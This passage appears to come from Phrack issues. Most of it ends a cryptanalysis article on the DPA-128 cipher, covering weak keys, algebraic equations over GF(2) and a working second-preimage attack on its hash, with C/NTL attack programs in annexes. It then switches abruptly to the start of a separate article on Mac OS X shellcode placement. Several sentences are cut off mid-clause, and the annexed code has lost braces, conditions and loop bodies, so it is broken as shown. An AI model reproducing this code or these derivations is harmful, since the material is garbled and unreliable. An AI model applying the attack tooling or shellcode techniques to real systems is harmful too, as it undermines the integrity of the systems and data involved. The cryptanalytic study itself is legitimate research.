However, recovering the subkey bits won't be that easy. Indeed, to determine
them, we need to get rid of the carries replacing them by multivariate 
polynomials were unknowns are monomials of huge order.

Remark 1: Because of the recursivity of the carry, the order of monomials 
grows up as the number of input bits per round as well as the number of 
rounds increases.

Remark 2: Obviously we can not use intermediary input/output bits in our
equations. This is because unlike the subkey bits, they are dependent of the

We are thus able to express the cryptosystem as a multivariate polynomial 
system over GF(2). Solving such a system is NP-hard. There exists methods
for system of reasonable order like groebner basis and relinearization 
techniques but the order of this system seems to be far too huge.

However for a particular set of keys, the so-called weak keys, it is 
possible to determine the subkeys quite easily getting rid of the complexity
introduced by the carry.

--[ 7 - Exploiting weak keys

Let's first define a weak key. According to wikipedia:

"In cryptography, a weak key is a key which when used with a specific 
cipher, makes the cipher behave in some undesirable way. Weak keys usually
represent a very small fraction of the overall keyspace, which usually 
means that if one generates a random key to encrypt a message weak keys are
very unlikely to give rise to a security problem. Nevertheless, it is 
considered desirable for a cipher to have no weak keys."

Actually we identified a particular subset |W of |K allowing us to deal 
quite easily with the carry problem. A key "k" is part of |W if and only if
for each round the shift parameter is a multiple of 8. The reader should 
understand why later.

We will first present the attack on a reduced version of DPA for simplicity
purpose and generalize it later to the full version.

--[ 7.1 - Playing with a toy cipher

Our toy cipher is a 2 rounds DPA. Moreover, the cipher takes as input 4*8
bits instead of 16*8 = 128 bits which means that DPA_BLOCK_SIZE = 4. We 
also make a little modification in bytechain() operation. Let's remember 
the bytechain() function:

void rbytechain(unsigned char *block)
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];

Since block is both input AND output of the function then we have for 

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor V(0) = U(0) xor U(1) xor U(3)

Where V(x) is the x'th byte element.

Thus with our modification:

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor U(0)

Regarding the mathematical notation (pay your ascii !@#):

    - U,V,W,Y vector notation of section 5 remains.
    - Xj(i) is the i'th bit of vector Xj where j is j'th round.
    - U0 vector is equivalent to P where P is a plaintext.
    - m is the shift of round 0
    - n is the shift of round 1
    - xor will be written '+' since calculation is done in GF(2)
    - All calculation of subscript will be done in the ring ZZ_32

How did we choose |W? Using algebra in GF(2) implies to deal with the carry.
However, if k is a weak key (part of |W), then we can manage the calculation
so that it's not painful anymore.

Let i be the lowest bit of any input byte. Therefore for each i part of the
set {0,8,16,24} we have:

u0(i)      = p(i)
v0(i)      = p(i) + p(i+8)
w0(i+m)    = v0(i)
y0(i)      = w0(i) + k0(i) + C0(i)
y0(i+m)    = w0(i+m) + k0(i+m) + C0(i+m)
y0(i+m)    = p(i) + p(i+8) + k0(i+m) + C0(i+m)            /* carry(0) = 0 */
y0(i+m)    = p(i) + p(i+8) + k0(i+m)

u1(i)      = y0(i)
v1(i)      = y0(i) + y0(i+8)
w1(i+n)    = v1(i)
y1(i)      = w1(i) + k1(i) + C1(i)
y1(i+n)    = w1(i+n) + k1(i+n) + C1(i+n)
y1(i+n)    = y0(i) + y0(i+8) + k1(i+n) + C1(i+n)
y1(i+n+m)  = y0(i+m) + y0(i+m+8) + k1(i+n+m) + C1(i+n+m)  /* carry(0) = 0 */
y1(i+n+m)  = p(i) + p(i+8) + k0(i+m) + p(i+8) + p(i+16) 
           + k0(i+m+8) + k1(i+n+m)
y1(i+n+m)  = p(i) + k0(i+m) + p(i+16) + k0(i+m+8) + k1(i+n+m)

As stated before, i is part of the set {0,8,16,24} so we can write:

y1(n+m)    = p(0)  + k0(m)    + p(16) + k0(m+8)  + k1(n+m)
y1(8+n+m)  = p(8)  + k0(8+m)  + p(24) + k0(m+16) + k1(8+n+m)
y1(16+n+m) = p(16) + k0(16+m) + p(0)  + k0(m+24) + k1(16+n+m)
y1(24+n+m) = p(24) + k0(24+m) + p(8)  + k0(m)    + k1(24+n+m)

In the case of a known plaintext attack, the attacker has the knowledge of
a set of couples (P,Y1). Therefore considering the previous system, the 
lowest bit of K0 and K1 vectors are the unknowns. Here we have a system 
which is clearly underdefined since it is composed of 4 equations and
4*2 unknowns. It will give us the relations between each lowest bit of Y 
and the lowest bits of K0 and K1. 

Remark 1: n,m are unknown. A trivial approach is to determine them which 
costs a complexity of (2^4)^2 = 2^8. Although it may seem a good idea, 
let's recall the reader that we are considering a round reduced cipher! 
Indeed, applying the same idea to the full 16 rounds would cost us 
(2^4)^16 = 2^64! Such a complexity is a pain in the ass even nowadays :-)

A much better approach is to guess (n+m) as it costs 2^4 what ever the 
number of rounds. It gives us the opportunity to write relations between 
some input and output bits. We do not need to know exactly m and n. The 
knowledge of the intermediate variables k0(x+m) and k1(y+n+m) is 

Remark 2: An underdefined system brings several solutions. We are 
thus able to choose arbitrarily 4 variables thus fixing them with values of 
our choice. Of course we have to choose so that we are able to solve the 
system with remaining variables. For example taking k0(m), k0(m+8) and 
k1(n+m) together is not fine because of the first equation. However, fixing
all the k0(x+m) may be a good idea as it automatically gives the k1(y+n+m) 
corresponding ones. 

Now let's go further. Let i be part of the set {1,9,17,25}. We can write:

u0(i)     = p(i)
v0(i)     = p(i) + p(i+8)
w0(i+m)   = v0(i)
y0(i)     = w0(i) + k0(i) + w0(i-1)*k0(i-1)
y0(i+m)   = w0(i+m) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
y0(i+m)   = p(i) + p(i+8) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
y0(i+m)   = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8))*k0(i+m-1)

u1(i)     = y0(i)
v1(i)     = y0(i) + y0(i+8)
w1(i+n)   = v1(i)
y1(i)     = w1(i) + k1(i) + C1(i)
y1(i)     = w1(i) + k1(i) + w1(i-1)*k1(i-1)
y1(i+n)   = w1(i+n) + k1(i+n) + w1(i-1+n)*k1(i-1+n)
y1(i+n)   = y0(i) + y0(i+8) + k1(i+n) + (y0(i-1) + y0(i+8-1)) * k1(i-1+n)

y1(i+n+m) = y0(i+m) + y0(i+m+8) + k1(i+m+n) 
          + (y0(i+m-1) + y0(i+m+8-1)) * k1(i+m+n-1)

y1(i+n+m) = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
          + p(i+8) + p(i+16) + k0(i+m+8) 
	  + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
	  + k1(i+n+m)
          + k1(i+m+n-1) * [p(i-1) + p(i+8-1) + k0(i+m-1)]
          + k1(i+m+n-1) * [p(i-1+8) + p(i+16-1) + k0(i+m-1+8)]

y1(i+n+m) = p(i) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
          + p(i+16) + k0(i+m+8) + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
          + k1(i+n+m)
          + k1(i+m+n-1)*[p(i-1) + k0(i+m-1)]
          + k1(i+m+n-1)*[p(i-1+16) + k0(i+m-1+8)]

Thanks to the previous system resolution, we have the knowledge of 
k0(i+m+n-1+x) and k1(i+m-1+y) variables. Therefore, we can reduce the 
previous equation to: 

A(i) = k0(i+m) + k0(i+m+8) + k1(i+n+m)           (alpha)

where A(i) is a known value for the attacker.

Remark 1: This equation represents the same system as found in case of i 
being the lowest bit! Therefore all previous remarks remain.

Remark 2: If we hadn't have the knowledge of k0(i+m+n-1+x) and k1(i+m-1+y)
bits then the number of variables would have grown seriously. Moreover we 
would have had to deal with some degree 2 monomials :-/.

We can thus conjecture that the equation alpha will remain true for each i 
part of {a,a+8,a+16,a+24} where 0 <= a < 8.

--[ 7.2 - Generalization and expected complexity

Let's deal with the real bytechain() function now.
As stated before and for DPA_BLOCK_SIZE = 4 we have:

V(0) = U(0) xor U(1)
V(1) = U(1) xor U(2)
V(2) = U(2) xor U(3)
V(3) = U(0) xor U(1) xor U(3)

This is clearly troublesome as the last byte V(3) is NOT calculated like 
V(0), V(1) and V(2). Because of the rotations involved, we wont be able to
know when the bit manipulated is part of V(3) or not.

Therefore, we have to use a general formula:

V(i) = U(i) + U(i+1) + a(i).U(i+2)
where a(i) = 1 for i = 24 to 31

For i part of {0,8,16,24} we have:

u0(i)     = p(i)
v0(i)     = p(i) + p(i+8)  + a0(i).p(i+16)
w0(i+m)   = v0(i)
y0(i)     = w0(i) + k0(i)   + C0(i)
y0(i+m)   = w0(i+m) + k0(i+m) + C0(i+m)
y0(i+m)   = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m) + C0(i+m) /*carry(0) = 0*/
y0(i+m)   = p(i) + p(i+8)  + a0(i).p(i+16) + k0(i+m)

So in the second round:

u1(i)     = y0(i)
v1(i)     = y0(i) + y0(i+8) + a1(i).y0(i+16)
w1(i+n)   = v1(i)
y1(i)     = w1(i) + k1(i) + C1(i)
y1(i+n)   = w1(i+n) + k1(i+n) + C1(i+n)
y1(i+n)   = y0(i) + y0(i+8) + a1(i).y0(i+16) + k1(i+n) + C1(i+n)
y1(i+n+m) = y0(i+m) + y0(i+m+8) + a1(i+m).y0(i+m+16) + k1(i+n+m)

y1(i+n+m) = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m)
          + p(i+8) + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
          + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)] + k1(i+n+m)

y1(i+n+m) = p(i) + a0(i).p(i+16) + k0(i+m)
          + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
          + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)] + k1(i+n+m)

a0(i) is not a problem since we know it. This is coherent with the fact 
that the first operation of the cipher is rbytechain() which is invertible
for the attacker. However, the problem lies in the a1(i+m) variables.

Guessing a1(i+m) is out of question as it would cost us a complexity of 
(2^4)^15 = 2^60 for the 16 rounds! The solution is to consider a1(i+m) as 
an other set of 4 variables. We can also add the equation to our system:

a1(m) + a1(m+8) + a1(m+16) + a1(m+24) = 1
This equation will remain true for other bits.

So what is the global complexity? Obviously with DPA_BLOCK_SIZE = 16 each 
system is composed of 16+1 equations of 16+1 variables (we fixed the 
others). Therefore, the complexity of the resolution is: 
log(17^3) / log(2) ~ 2^13.

We will solve 8 systems since there are 8 bits per byte. Thus the global 
complexity is around (2^13)*8 = 2^16.

Remark: We didn't take into account the calculation of equation as it is 
assumed to be determined using a formal calculation program such as pari-gp 
or magma.

--[ 7.3 - Cardinality of |W

What is the probability of choosing a weak key? We have seen that our weak
key criterion is that for each round, the rotation parameter needs to be 
multiple of 8. Obviously, it happens with 16 / 128 = 1/8 theoretical 
probability per round. Since we consider subkeys being random, the 
generation of rotation parameters are independent which means that the 
overall probability is (1/16)^16 = 1/2^64.

Although a probability of 1/2^64 means a (huge) set of 2^64 weak keys, in
the real life, there are very few chances to choose one of them. In fact,
you probably have much more chances to win lottery ;) However, two facts 
must be noticed:

    - We presented one set of weak keys but there be some more!
    - We illustrated an other weakness in the conception of DPA-128

Remark: A probability of 1/8 per round is completely theoretic as it 
supposes a uniform distribution of hash32() output. Considering the extreme
simplicity of the hash32() function, it wouldn't be too surprising to be
different in practice. Therefore we made a short test to compute the real 
probability (Annexe B).

$ gcc test.hash32.c checksum128.o hash32.o -o test.hash32 -O3 
$ time ./test.hash32
[+] Probability is 0.125204

real 0m14.654s
user 0m14.649s
sys 0m0.000s

$ gp -q
? (1/0.125204) ^ 16
? log(274226068900783.2739747241633) / log(2)

This result tells us clearly that the probability of shift being multiple 
of 8 is around 1/2^2.99 ~ 1/8 per round which is assimilated to the 
theoretical one since the difference is too small to be significant. In 
order to improve the measure, we used checksum128() as an input of 
hash32(). Furthermore, we also tried to test hash32() without the "*k &&" 
bug mentioned earlier. Both tests gave similar results which means that the
bug is not important in practice and that checksum128() doesn't seem to be 
particularly skewed. This is a good point for DPA! :-D

--[ 8 - Breaking DPA-based unkeyed hash function

In his paper, Veins also explains how a hash function can be built out of 
DPA. We will analyze the proposed scheme and will show how to completely 
break it.

--[ 8.1 - Introduction to hash functions

Quoting once again the excellent HAC [MenVan]:
"A hash function is a function h which has, as a minimum, the following two

1. compression - h maps an input x of arbitrary finit bitlength, to an
output h(x) of fixed bitlength n.
2. ease of computation - given h and an input x, h(x) is easy to compute.

In cryptography there are essentially two families of hash functions:

1. The MAC (Message Authentication Codes). They are keyed ones and provides
both authentication (of source) and integrity of messages.
2. The MDC (Modification Detection Code), sometimes referred as MIC. They 
are unkeyed and only provide integrity. We will focus on this kind of 
functions. When designing his hash function, the cryptographer generally 
wants it to satisfy the three properties:

- preimage resistance. For any y, it should not be possible (that is to say
computationally infeasible) to find an x such as h(x) = y. Such a property
implies that the function has to be non invertible.
- 2nd preimage resistance. For any x, it should not be possible to find an
x' such as h(x) = h(x') when x and x' are different.
- collision resistance. It should not be possible to find an x and an x' 
(with x different of x') such that h(x) = h(x').

Remark 1: Properties 1 and 2 and essentials when dealing with binary 

Remark 2: The published attacks on MD5 and SHA-0/SHA-1 were dealing with the
third property. While it is true that finding collisions on a hash function
is enough for the crypto community to consider it insecure (and sometimes
leads to a new standard [NIST2007]), for most of usages it still remains 

There are many way to design an MDC function. Some functions are based on
MD4 function such as MD5 or SHA* functions which heavily rely on boolean 
algebra and operations in GF(2^32), some are based on NP problems such as 
RSA and finally some others are block cipher based.

The third category is particularly interesting since the security of the
hash function can be reduced to the one of the underlying block cipher. 
This is of course only true with a good design.

--[ 8.2 - DPAsum() algorithm

The DPA-based hash function lies in the functions DPA_sum() and 
DPA_sum_write_to_file() which can be found respectively in file sum.c and

Let's detail them a little bit using pseudo code:

Let M be the message to hash, let M(i) be the i'th 128b block message.
Let N = DPA_BLOCK_SIZE * i + j be the size in bytes of the message where i
and j are integers such as i = N / DPA_BLOCK_SIZE and 0 <= j < 16.
Let C be an array of 128 bits elements were intermediary results of hash
calculation are stored. The last element of this array is the hash of the

func DPA_sum(K0,M,C):
    K0 = key("deadbeef");
    IV = "0123456789abcdef";
    C(0) = E( IV , K0);
    C(1) = E( IV xor M(0) , K0);
    FOR a = 1 to i-1:
        C(a+1) = E( C(a) xor M(a) , K0);

    if j == 0:
        C(i+1) = E( C(i) xor 000...000 , K0)
        C(i+1) = E( C(i) xor PAD( M(i) );
        C(i+2) = E( C(i+1) xor 000...00S , K0) /* s = 16-j */

func DPA_sum_write_to_file(C, file):


--[ 8.3 - Weaknesses in the design/implementation

We noticed several implementation mistakes in the code:

a) Using the algorithm of hash calculation, every element of array C is 
defined recursively however C(0) is never used in calculation. This doesn't
impact security in itself but is somewhat strange and could let us think 
that the function was not designed before being programmed.

b) When the size of M is not a multiple of DPA_BLOCK_SIZE (j is not equal 
to 0) then the algorithms calculates the last element using a xor mask where
the last byte gives information on the size of the original message. 
However, what is included in the padding is not the size of the message in 
itself but rather the size of padding.

If we take the example of the well known Merkle-Damgard construction on 
which are based MD{4,5} and SHA-{0,1} functions, then the length of the 
message was initially appended in order to prevent collisions attacks for
messages of different sizes. Therefore in the DPASum() case, appending j 
to the message is not sufficient as it would be possible to find collisions
for messages of size (DPA_BLOCK_SIZE*a + j) and (DPA_BLOCK_SIZE*b + j) were
obviously a and b are different.

Remark: The fact that the IV and the master key are initially fixed is not
a problem in itself since we are dealing with MDC here.

--[ 8.4 - A (2nd) preimage attack

Because of the hash function construction properties, being given a 
message X, it is trivial to create a message X' such as h(X) = h(X'). This
is called building a 2nd preimage attack.

We built a quick & dirty program to illustrate it (Annexe C). It takes a 
32 bytes message as input and produces an other 32 bytes one with the same 

$ cat to.hack | hexdump -C
00000000 58 41 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 |XALKXCLKSDLFKSDF|
00000010 58 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 0a |XLKXCLKSDLFKSDF.|
$ ./dpa -s to.hack
$ gcc break_hash.c *.o -o break_hash -I ./include
$ ./break_hash to.hack > hacked
$ ./dpa -s hacked
$ cat hacked | hexdump -C
00000000 43 4f 4d 50 4c 45 54 45 4c 59 42 52 4f 4b 45 4e |COMPLETELYBROKEN|
00000010 3e bf de 93 d7 17 7e 1d 2a c7 c6 70 66 bb eb a3 |>.....~.*|

Nice isn't it ? :-) We were able to write arbitrary data in the first 16 
bytes and then to calculate the next 16 bytes so that the 'hacked' file had
the exact same hash. But how did we do such an evil thing?

Assuming the size of both messages is 32 bytes then:

h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, it is obvious that:

h(M1) = h(M2) is equivalent to
E(E(M1(0) xor IV,K0) xor M1(1),K0) = E(E(M2(0) xor IV,K0) xor M2(1),K0)

Which can be reduced to:
E(M1(0) xor IV,K0) xor M1(1) = E(M2(0) xor IV,K0) xor M2(1)

Which therefore gives us:
M2(1) = E(M2(0) xor IV,K0) xor E(M1(0) xor IV,K0) xor M1(1)  [A]

Since M1,IV,K0 are known parameters then for a chosen M2(0), [A] gives us 
M2(1) so that h(M1) = h(M2).

Remark 1: Actually such a result can be easily generalized to n bytes 
messages. In particular, the attacker can put anything in his message and
"correct it" using the last blocks (if n >= 32).

Remark 2: Of course building a preimage attack is also very easy. We 
mentioned previously that we had for a 32 bytes message:
h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, Mi(1) = E^-1(h(Mi),K0) xor E(Mi(0) xor IV,K0)     [B]

The [B] equation tells us how to generate Mi(1) so that we have h(Mi) in
output. It doesn't seem to be really a one way hash function does it ? ;-)
Building a hash function out of a block cipher is a well known problem in
cryptography which doesn't only involve the security of the underlying 
block cipher. One should rely on one of the many well known and heavily 
analyzed algorithms for this purpose instead of trying to design one.

--[ 9 - Conclusion

We put into evidence some weaknesses of the cipher and were also able to 
totally break the proposed hash function built out of DPA. In his paper, 
Veins implicitly set the bases of a discussion to which we wish to deliver
our opinion. We claim that it is necessary to understand properly 
cryptology. The goal of this paper wasn't to illustrate anything else but 
that fact. Being hacker or not, paranoid or simply careful, the rule is the
same for everybody in this domain: nothing should be done without reflexion.

--[ 10 - Greetings

#TF crypto dudes for friendly and smart discussions and specially X for 
giving me a lot of hints. I learned a lot from you guys :-)
#K40r1 friends for years of fun ;-) Hi all :)
Finally but not least my GF and her kindness which is her prime 
characteristic :> (However if she finds out the joke in the last sentence
I may die :|)

--[ 11 - Bibliography

[DPA128] A Polyalphabetic Substitution Cipher, Veins, Phrack 62.
[FakeP63] Keeping 0day Safe, m1lt0n, Phrack(.nl) 63.
[MenVan] Handbook of Applied Cryptography, Menezes, Oorschot & Vanstone.
[Knud99] Correlation in RC6, L. Knudsen & W. Meier.
[CrypTo] Two balls ownz one,
[Vaud] An Experiment on DES - Statistical Cryptanalysis, S. Vaudenay.
[Ryabko] Adaptative chi-square test and its application to some 
cryptographic problems, B. Ryabko.
[CourtAlg] How Fast can be Algebraic Attacks on Block Ciphers ?, Courtois.
[BiSha90] Differential Cryptanalysis of DES-like Cryptosystems, E. Biham 
& A. Shamir, Advances in Cryptology - CRYPTO 1990.
[Matsui92] A new method for known plaintext attack of FEAL cipher, Matsui
& A. Yamagishi, EUROCRYPT 1992.
[NSA2007] Just kidding ;-)
[SHOUP] NTL library, V. Shoup,
[NIST2007] NIST,, 2007

--[ Annexe A - Breaking the linearised version

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
/* Crappy C/C++ source. I'm in a hurry for the paper redaction so don't 
 * blame me toooooo much please ! :> */

#include <iostream>
#include <fstream>
#include <openssl/rc4.h>
#include <NTL/ZZ.h>
#include <NTL/ZZ_p.h>
#include <NTL/mat_GF2.h>
#include <NTL/vec_GF2.h>
#include <NTL/GF2E.h>
#include <NTL/GF2XFactoring.h>
#include "dpa.h"

using namespace NTL;

S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= (key[i] ^ s) % 256;

E2 (unsigned char *key, unsigned char *block, unsigned int shift)
    rbytechain (block);
    rbitshift (block, shift);
    S_E2 (key, block, shift);

DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
    int j;
    memcpy (dst, src, DPA_BLOCK_SIZE);
    for (j = 0; j < 16; j++)
        E2 (key->subkey[j].key, dst, key->subkey[j].shift);

void affichage(unsigned char *chaine)
    int i;
    for(i=0; i<16; i++)
        printf("%.2x",(unsigned char )chaine[i]);

unsigned char test_p[] = "ABCD_ABCD_12____";
unsigned char test_c1[16];
unsigned char test_c2[16];
DPA_KEY key;
RC4_KEY rc4_key;

struct vect {
    unsigned char plaintxt[16];
    unsigned char ciphertxt[16];

struct vect toto[128];
unsigned char src1[16], src2[16];
unsigned char block1[16], block2[16];

int main()

    /* Key */
    unsigned char str_key[] = " _323DFF?FF4cxsdé&";
    DPA_set_key (&key, str_key, DPA_KEY_SIZE);
    /* Init our RANDOM generator */
    char time_key[16];
    snprintf(time_key, 16, "%d%d",(int)time(NULL), (int)time(NULL));
    RC4_set_key(&rc4_key, strlen(time_key), (unsigned char *)time_key);
    /* Let's crypt 16 plaintexts */
    printf("[+] Generating the plaintexts / ciphertexts\n");
    int i=0;
    int a=0;
    for(; i<128; i++)
         RC4(&rc4_key, 16, src1, src1); // Input is nearly random :)
         DPA_ecb_encrypt (&key, src1, block1);
         RC4(&rc4_key, 16, src2, src2); // Input is nearly random :)
         DPA_ecb_encrypt (&key, src2, block2);
	 for(a=0;a<16; a++)
             toto[i].plaintxt[a] = src1[a] ^ src2[a];
             toto[i].ciphertxt[a] = block1[a] ^ block2[a];

    /* Now the NTL stuff */

    printf("[+] NTL stuff !\n");
    vec_GF2 m2(INIT_SIZE,128);
    vec_GF2 B(INIT_SIZE,128);
    mat_GF2 M(INIT_SIZE,128,128);
    mat_GF2 Mf(INIT_SIZE,128,128); // The final matrix !

    /* Lets fill M correctly */
    int k=0;
    int j=0;
    for(k=0; k<128; k++) // each row !
        for(i=0; i<16; i++)
            for(j=0; j<8; j++)
                M.put(i*8+j,k,(toto[k].plaintxt[i] >> j)&0x1);

    GF2 d;

    /* if !det then it means the vector were linearly linked :'( */
       std::cout << "det(M) = 0\n" ;

   /* Let's solve the 128 system :) */
    printf("[+] Calculation of Mf\n");
    for(k=0; k<16; k++)
        for(j=0; j<8; j++)
            for(i=0; i<128; i++)
                 B.put(i,(toto[i].ciphertxt[k] >> j)&0x1);
            solve(d, m2, M, B);

#ifdef __debug__
            std::cout << "m2 is " << m2 << "\n";

            int b=0;

#ifdef __debug__
    std::cout << "Mf = " << Mf << "\n";

    /* Now that we have Mf, let's make a test ;) */

    printf("[+] Let's make a test !\n");
    bzero(test_c1, 16);
    bzero(test_c2, 16);
    char DELTA_X[16];
    char DELTA_Y[16];
    bzero(DELTA_X, 16);
    bzero(DELTA_Y, 16);
    DPA_ecb_encrypt (&key, test_p, test_c1);

    // DELTA_X !
    unsigned char U0[] = "ABCDEFGHABCDEFG1";
    unsigned char Y0[16];
    DPA_ecb_encrypt (&key, U0, Y0);
    for(i=0; i<16; i++)
        DELTA_X[i] = test_p[i] ^ U0[i];

    // DELTA_Y !
    vec_GF2 X(INIT_SIZE,128);
    vec_GF2 Y(INIT_SIZE,128);
    for(k=0; k<16; k++)
         for(j=0; j<8; j++)
             X.put(k*8+j,(DELTA_X[k] >> j)&0x1);

    Y = Mf * X;

#ifdef __debug__
    std::cout << "X = " << X << "\n";
    std::cout << "Y = " << Y << "\n";

    GF2 z;
    for(k=0; k<16; k++)
        for(j=0; j<8; j++)
            z = Y.get(k*8+j);
                DELTA_Y[k] |= (1 << j);

    // test_c2 !

    for(i=0; i<16; i++)
        test_c2[i] = DELTA_Y[i] ^ Y0[i];

    /* Compare the two vectors */
        printf("\t=> Well done boy :>\n");
        printf("\t=> Hell !@#\n");

#ifdef __debug__
    return 0;
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -

--[ Annexe B - Probability evaluation of (hash32()%8 == 0)

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>


int main()
    int i = 0, j = 0;
    char buffer[16];
    int cmpt = 0;
    int rand = (time_t)time(NULL);
    float proba = 0;
        for(j=0; j<4; j++)
            rand = random();
        checksum128 (buffer, buffer, 16);
    proba = (float)cmpt/(float)NBR_TESTS;
    printf("[+] Probability is around %f\n",proba);
    return 0;
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -

--[ Annexe C - 2nd preimage attack on 32 bytes messages

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "dpa.h"

E2 (unsigned char *key, unsigned char *block, unsigned int shift)
    rbytechain (block);
    rbitshift (block, shift);
    S_E (key, block, shift);

DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
    int j;
    memcpy (dst, src, DPA_BLOCK_SIZE);
    for (j = 0; j < 16; j++)
        E2 (key->subkey[j].key, dst, key->subkey[j].shift);

void affichage(unsigned char *chaine)
    int i;
    for(i=0; i<16; i++)
        printf("%.2x",(unsigned char )chaine[i]);

int main(int argc, char **argv)
    DPA_KEY key;
    unsigned char str_key[] = "deadbeef";
    unsigned char IV[] = "0123456789abcdef";
    unsigned char evil_payload[] = "COMPLETELYBROKEN";
    unsigned char D0[16],D1[16];
    unsigned char final_message[32];
    int fd_r = 0;
    int i = 0;
    if(argc < 2)
        printf("Usage : %s <file>\n",argv[0]);

    DPA_set_key (&key, str_key,8);
    if((fd_r = open(argv[1], O_RDONLY)) < 0)
        printf("[+] Fuck !@#\n");

    if(read(fd_r, D0, 16) != DPA_BLOCK_SIZE)
        printf("Too short !@#\n");

    if(read(fd_r, D1, 16) != DPA_BLOCK_SIZE)
        printf("Too short 2 !@#\n");
    memcpy(final_message, evil_payload, DPA_BLOCK_SIZE);
    blockchain(evil_payload, IV);
    DPA_ecb_encrypt (&key, evil_payload, evil_payload);
    DPA_ecb_encrypt (&key, D0, D0);
    blockchain(evil_payload, D0);
    memcpy(final_message+DPA_BLOCK_SIZE, evil_payload, DPA_BLOCK_SIZE);
    for(i=0; i<DPA_BLOCK_SIZE*2; i++)
    return 0;
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -


              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 11               (* *)
            | - |                                            | - |
            |   |        Mac OS X wars - a XNU Hope          |   |
            |   |                                            |   |
            |   |      by nemo <>       |   |
            |   |                                            |   |
            |   |                                            |   |

--[ Contents

  1 - Introduction.

  2 - Local shellcode maneuvering.

  3 - Resolving symbols from Shellcode.

  4 - Architecture spanning shellcode.

  5 - Writing kernel level shellcode.
   5.1 - Local privilege escalation
   5.2 - Breaking chroot()
   5.3 - Advancements

  6 - Misc rootkit techniques.

  7 - Universal binary infection.

  8 - Cracking example - Prey

  9 - Passive malware propagation with mDNS

 10 - Kernel zone allocator exploitation.

 11 - Conclusion

 12 - References

 13 - Appendix A: Code

--[ 1 - Introduction

This paper was written in order to document my research while 
playing with Mac OS X shellcode.  During this process, however,
the paper mutated and evolved to cover a selection of Mac OS X 
related topics which will hopefully make for an interesting read.

Due to the growing popularity of Mac OS X on Intel over PowerPC platforms,
I have mostly focused on techniques for the former.  Many of the concepts 
shown are still applicable on PowerPC architecture, but their particular
implementation is left as an excercise for the reader.

There are already several well written documents on PowerPC and 
Intel assembly language; I will therefore make no attempt to try
and teach you these things. 

If you have any suggestions on how to shorten/tighten the code I 
have written for this paper please drop me an email with the details at:

A tar file containing the full code listings referenced in this paper 
can be found in Appendix A.

--[ 2 - Local shellcode maneuvering.

Over the years there have been many different techniques 
developed to calculate valid return addresses when 
exploiting buffer overflows in applications local to 
your system.  Unfortunately many of these techniques are
now obsolete on Intel-based Mac OS X systems with the 
introduction of a non-executable stack in version 10.4

In the following subsections I will discuss a few historical 
approaches for calculating shellcode addresses in memory  
and introduce a new method for positioning shellcode at a 
fixed location in the address space of a vulnerable target 

--[ 2.1 Historical perspective 1: Aleph1

Over the years there have been many different techniques 
developed to calculate a valid return address when exploiting
a buffer overflow in an application local to your system. 
The most widely known of these is shown in aleph1's "Smashing 
the Stack for Fun and Profit". [9] In this paper, aleph1 simply
writes a small function get_sp() shown below.

	unsigned long get_sp(void) {
	   __asm__("movl %esp,%eax");

This function returns the current stack pointer (esp). 
aleph1 then simply offsets from this value, in an attempt to hit
the nop sled before his shellcode on the stack. This method is
not as precise as it can be, and also requires the shellcode to
be stored on the stack.  This is an obvious issue if your stack is

--[ 2.2 Historical perspective 2: Radical Environmentalist

Another method for storing shellcode and calculating the address
of it inside another process is shown in the Radical 
Environmentalist paper written by the Netric Security Group [10].

In this paper, the author shows that the execve() syscall allows 
full control over the stack of the freshly executed process. 
Because of this, shellcode can be stored in an environment 
variable, the address of which can be calculated as displacement 
from the top of the stack.

In older exploits for Mac OS X (prior to 10.4), this technique 
worked quite well. Since there is no non-executable stack on 

--[ 2.3 Beating stack prot :P or whatever

In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11], 
the author demonstrates a technique for removing stack protection
by returning into mprotect() in libSystem (libc) before
returning into their payload. While this technique is very useful
for remote exploitation, a more elegant solution to this problem 
exists for local exploitation.

The first step to getting our shellcode in place is to get some 
shellcode. There has already been significant published work 
in this area. If you are interested to learn how to write 
shellcode for Mac OS X for use in local privilege escalation 
exploits, a couple of papers you should definitely check out are
shown in the references section. [1] and [8]. The shellcode 
